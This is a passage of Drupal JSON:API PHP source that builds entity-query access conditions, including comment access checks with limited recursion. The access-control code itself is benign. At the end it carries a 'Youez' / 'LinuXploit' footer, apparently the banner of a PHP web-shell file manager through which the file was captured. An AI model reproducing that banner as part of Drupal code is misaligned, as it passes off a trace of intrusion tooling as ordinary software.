    // subset, so return alwaysFalse().
    if (empty($conditions)) {
      return static::alwaysFalse($entity_type);
    }

    // If more than one condition was added above, then access was granted to
    // more than one subset, so combine them with an OR.
    if (count($conditions) > 1) {
      return new EntityConditionGroup('OR', $conditions);
    }

    // Otherwise return the single condition.
    return $conditions[0];
  }

  /**
   * Gets the combined access result for each JSONAPI_FILTER_AMONG_* subset.
   *
   * This invokes hook_jsonapi_entity_filter_access() and
   * hook_jsonapi_ENTITY_TYPE_filter_access() and combines the results from all
   * of the modules into a single set of results.
   *
   * @param \Drupal\Core\Entity\EntityTypeInterface $entity_type
   *   The entity type for which to check filter access.
   * @param \Drupal\Core\Session\AccountInterface $account
   *   The account for which to check access.
   *
   * @return \Drupal\Core\Access\AccessResultInterface[]
   *   The array of access results, keyed by subset. See
   *   hook_jsonapi_entity_filter_access() for details.
   */
  protected static function getAccessResultsFromEntityFilterHook(EntityTypeInterface $entity_type, AccountInterface $account) {
    /** @var \Drupal\Core\Access\AccessResultInterface[] $combined_access_results */
    $combined_access_results = [
      JSONAPI_FILTER_AMONG_ALL => AccessResult::neutral(),
      JSONAPI_FILTER_AMONG_PUBLISHED => AccessResult::neutral(),
      JSONAPI_FILTER_AMONG_ENABLED => AccessResult::neutral(),
      JSONAPI_FILTER_AMONG_OWN => AccessResult::neutral(),
    ];

    // Invoke hook_jsonapi_entity_filter_access() and
    // hook_jsonapi_ENTITY_TYPE_filter_access() for each module and merge its
    // results with the combined results.
    foreach (['jsonapi_entity_filter_access', 'jsonapi_' . $entity_type->id() . '_filter_access'] as $hook) {
      static::$moduleHandler->invokeAllWith(
        $hook,
        function (callable $hook, string $module) use (&$combined_access_results, $entity_type, $account) {
          $module_access_results = $hook($entity_type, $account);
          if ($module_access_results) {
            foreach ($module_access_results as $subset => $access_result) {
              $combined_access_results[$subset] = $combined_access_results[$subset]->orIf($access_result);
            }
          }
        }
      );
    }

    return $combined_access_results;
  }

  /**
   * Gets an access condition for a comment entity.
   *
   * Unlike all other core entity types, Comment entities' access control
   * depends on access to a referenced entity. More challenging yet, that entity
   * reference field may target different entity types depending on the comment
   * bundle. This makes the query access conditions sufficiently complex to
   * merit a dedicated method.
   *
   * @param \Drupal\Core\Entity\EntityTypeInterface $comment_entity_type
   *   The comment entity type object.
   * @param \Drupal\Core\Session\AccountInterface $current_user
   *   The current user.
   * @param \Drupal\Core\Cache\CacheableMetadata $cacheability
   *   Collects cacheability for the query.
   * @param int $depth
   *   Internal use only. The recursion depth. It is possible to have comments
   *   on comments, but since comment access is dependent on access to the
   *   entity on which they live, this method can recurse endlessly.
   *
   * @return \Drupal\jsonapi\Query\EntityConditionGroup|null
   *   An EntityConditionGroup or NULL if no conditions need to be applied to
   *   secure an entity query.
   */
  protected static function getCommentAccessCondition(EntityTypeInterface $comment_entity_type, AccountInterface $current_user, CacheableMetadata $cacheability, $depth = 1) {
    // If a comment is assigned to another entity or author the cache needs to
    // be invalidated.
    $cacheability->addCacheTags($comment_entity_type->getListCacheTags());
    // Constructs a big EntityConditionGroup which will filter comments based on
    // the current user's access to the entities on which each comment lives.
    // This is especially complex because comments of different bundles can
    // live on entities of different entity types.
    $comment_entity_type_id = $comment_entity_type->id();
    $field_map = static::$fieldManager->getFieldMapByFieldType('entity_reference');
    assert(isset($field_map[$comment_entity_type_id]['entity_id']['bundles']), 'Every comment has an `entity_id` field.');
    $bundle_ids_by_target_entity_type_id = [];
    foreach ($field_map[$comment_entity_type_id]['entity_id']['bundles'] as $bundle_id) {
      $field_definitions = static::$fieldManager->getFieldDefinitions($comment_entity_type_id, $bundle_id);
      $commented_entity_field_definition = $field_definitions['entity_id'];
      // Each commented entity field definition has a setting which indicates
      // the entity type of the commented entity reference field. This differs
      // per bundle.
      $target_entity_type_id = $commented_entity_field_definition->getSetting('target_type');
      $bundle_ids_by_target_entity_type_id[$target_entity_type_id][] = $bundle_id;
    }
    $bundle_specific_access_conditions = [];
    foreach ($bundle_ids_by_target_entity_type_id as $target_entity_type_id => $bundle_ids) {
      // Construct a field specifier prefix which targets the commented entity.
      $condition_field_prefix = "entity_id.entity:$target_entity_type_id";
      // Ensure that for each possible commented entity type (which varies per
      // bundle), a condition is created that restricts access based on access
      // to the commented entity.
      $bundle_condition = new EntityCondition($comment_entity_type->getKey('bundle'), $bundle_ids, 'IN');
      // Comments on comments can create an infinite recursion! If the target
      // entity type ID is comment, we need special behavior.
      if ($target_entity_type_id === $comment_entity_type_id) {
        $nested_comment_condition = $depth <= 3
          ? static::getCommentAccessCondition($comment_entity_type, $current_user, $cacheability, $depth + 1)
          : static::alwaysFalse($comment_entity_type);
        $prefixed_comment_condition = static::addConditionFieldPrefix($nested_comment_condition, $condition_field_prefix);
        $bundle_specific_access_conditions[$target_entity_type_id] = new EntityConditionGroup('AND', [$bundle_condition, $prefixed_comment_condition]);
      }
      else {
        $target_condition = static::getAccessCondition($target_entity_type_id, $cacheability);
        $bundle_specific_access_conditions[$target_entity_type_id] = !is_null($target_condition)
          ? new EntityConditionGroup('AND', [
            $bundle_condition,
            static::addConditionFieldPrefix($target_condition, $condition_field_prefix),
          ])
          : $bundle_condition;
      }
    }

    // This condition ensures that the user is only permitted to see the
    // comments for which the user is also able to view the entity on which each
    // comment lives.
    $commented_entity_condition = new EntityConditionGroup('OR', array_values($bundle_specific_access_conditions));
    return $commented_entity_condition;
  }

  /**
   * Gets an always FALSE entity condition group for the given entity type.
   *
   * @param \Drupal\Core\Entity\EntityTypeInterface $entity_type
   *   The entity type for which to construct an impossible condition.
   *
   * @return \Drupal\jsonapi\Query\EntityConditionGroup
   *   An EntityConditionGroup which cannot evaluate to TRUE.
   */
  protected static function alwaysFalse(EntityTypeInterface $entity_type) {
    return new EntityConditionGroup('AND', [
      new EntityCondition($entity_type->getKey('id'), 1, '<'),
      new EntityCondition($entity_type->getKey('id'), 1, '>'),
    ]);
  }

  /**
   * Recursively collects all entity query condition fields.
   *
   * Entity conditions can be nested within AND and OR groups. This recursively
   * finds all unique fields in an entity query condition.
   *
   * @param \Drupal\jsonapi\Query\EntityConditionGroup $group
   *   The root entity condition group.
   * @param array $fields
   *   Internal use only.
   *
   * @return array
   *   An array of entity query condition field names.
   */
  protected static function collectFilteredFields(EntityConditionGroup $group, array $fields = []) {
    foreach ($group->members() as $member) {
      if ($member instanceof EntityConditionGroup) {
        $fields = static::collectFilteredFields($member, $fields);
      }
      else {
        $fields[] = $member->field();
      }
    }
    return array_unique($fields);
  }

  /**
   * Copied from \Drupal\jsonapi\IncludeResolver.
   *
   * @see \Drupal\jsonapi\IncludeResolver::buildTree()
   */
  protected static function buildTree(array $paths) {
    $merged = [];
    foreach ($paths as $parts) {
      // This complex expression is needed to handle the string, "0", which
      // would be evaluated as FALSE.
      if (!is_null(($field_name = array_shift($parts)))) {
        $previous = $merged[$field_name] ?? [];
        $merged[$field_name] = array_merge($previous, [$parts]);
      }
    }
    return !empty($merged) ? array_map([static::class, __FUNCTION__], $merged) : $merged;
  }

}

Youez - 2016 - github.com/yon3zu
LinuXploit